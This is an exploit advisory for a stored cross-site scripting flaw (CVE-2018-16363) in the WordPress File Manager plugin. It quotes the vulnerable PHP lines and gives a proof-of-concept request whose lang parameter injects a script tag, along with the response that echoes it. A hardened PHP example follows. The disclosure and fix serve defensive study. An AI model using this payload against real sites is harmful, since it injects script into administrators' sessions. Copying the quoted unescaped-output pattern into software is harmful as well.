file:file_folder_manager.php
code:set_transient( 'wp_fm_lang', $_GET['lang'] , 60 * 60 * 720 );

file:lib\wpfilemanager.php
code:var fmlang = "<?php echo isset($_GET['lang']) ? $_GET['lang'] : ($wp_fm_lang !== false) ? $wp_fm_lang : 'en';?>";

poc:

request

GET /blog/wp-admin/admin.php?page=wp_file_manager&lang=zh_CN</script><script>alert(1234567890)</script> HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Cookie: wordpress_5aa6a4a225f40db86349342d0826a90c=admin%7C1535989327%7CKko2gM0P0FjhgEpNTIqRneg9Ky7aKaqWloRFGrsyw6q%7C71f1ed8075d5a34b82548bb0a92e6b6338ecf8fba0adc57da627d55f07693220; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_5aa6a4a225f40db86349342d0826a90c=admin%7C1535989327%7CKko2gM0P0FjhgEpNTIqRneg9Ky7aKaqWloRFGrsyw6q%7C5fbc26f57a4eaf15c60c5840d5fa14f296e3bb1c66e567358d761a3963d1bb82; wp-settings-1=deleted; wp-settings-time-1=1535770900; PHPSESSID=501108188d8569138517f08ba9741c92
Connection: close
Upgrade-Insecure-Requests: 1

response

HTTP/1.1 200 OK
Date: Sat, 01 Sep 2018 15:55:34 GMT
Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.2.17
X-Powered-By: PHP/5.2.17
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
Referrer-Policy: strict-origin-when-cross-origin
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47316

<!DOCTYPE html>
<!--[if IE 8]>
<html xmlns="http://www.w3.org/1999/xhtml" class="ie8 wp-toolbar"  lang="zh-CN">
<![endif]-->
<!--[if !(IE 8) ]><!-->
<html xmlns="http://www.w3.org/1999/xhtml" class="wp-toolbar"  lang="zh-CN">
<!--<![endif]-->
.........
<script>
var security_key = "b3ee874749";
var fmlang = "zh_CN</script><script>alert(1234567890)</script>";
var vle_nonce = "863ad12aa7";
.........
</body>
</html>
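
A hardened form of the two lines quoted at the top, as an added example rather than the plugin's own code or the fix from the changeset: the `lang` value is checked against an allowlist before it is stored or used, and it is JSON-encoded with the `JSON_HEX_*` flags when written into the inline script. The `fm_*` function names and the language list are assumptions; in WordPress, `set_transient()` would receive only the validated value.

```php
<?php
// Added example, not the plugin's code or its patch. Plain PHP (5.6+), no
// WordPress needed; the fm_* names and the allowlist are hypothetical.

// Language codes the UI ships (constructed sample list).
const FM_LANGS = array('en', 'de', 'fr', 'zh_CN', 'zh_TW');

// Return $raw only if it is a known language code, else the fallback.
// Also rejects array input such as ?lang[]=x.
function fm_validate_lang($raw, $fallback = 'en') {
    if (!is_string($raw) || !in_array($raw, FM_LANGS, true)) {
        return $fallback;
    }
    return $raw;
}

// Encode a value as a JavaScript string literal that is safe inside an inline
// <script> block: <, >, &, ' and " are emitted as \uXXXX escapes, so the HTML
// parser never sees a closing script tag inside the string.
function fm_js_string($value) {
    return json_encode((string) $value,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
}

// Request parameter first, then the stored value (false when nothing is
// stored, as get_transient() reports it), then 'en'. Explicit branches replace
// the nested ternary; the stored value is validated again because it may have
// been written before validation existed.
function fm_pick_lang(array $query, $stored) {
    if (isset($query['lang'])) {
        return fm_validate_lang($query['lang']);
    }
    if ($stored !== false) {
        return fm_validate_lang($stored);
    }
    return 'en';
}

// Constructed inputs: the lang value from the request above, a legitimate
// code, and the same request value found in storage.
$poc = 'zh_CN</script><script>alert(1234567890)</script>';
echo 'var fmlang = ' . fm_js_string(fm_pick_lang(array('lang' => $poc), false)) . ";\n";
echo 'var fmlang = ' . fm_js_string(fm_pick_lang(array('lang' => 'zh_CN'), false)) . ";\n";
echo 'var fmlang = ' . fm_js_string(fm_pick_lang(array(), $poc)) . ";\n";
// Output encoding alone also keeps the value inside the string literal.
echo 'var fmlang = ' . fm_js_string($poc) . ";\n";
```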

Exploit Title: WordPress Plugin File Manager 2.9 - Stored XSS

Exploit Author: ly55521

Google Dork: N/A

Type: XSS

Date: 2018-09-02

Vendor Homepage: N/A

Software Link: https://wordpress.org/plugins/wp-file-manager/

Affected Version: < 3.0

Tested on: Kali OS

CVE: CVE-2018-16363

Related links:

Update record: http://plugins.trac.wordpress.org/changeset/1936043
EXP: https://blog.51cto.com/010bjsoft/2171087
Vulnerability report: https://wordpress.org/support/topic/security-concern-6/#post-10655739
Safe link: https://wordpress.org/plugins/wp-file-manager/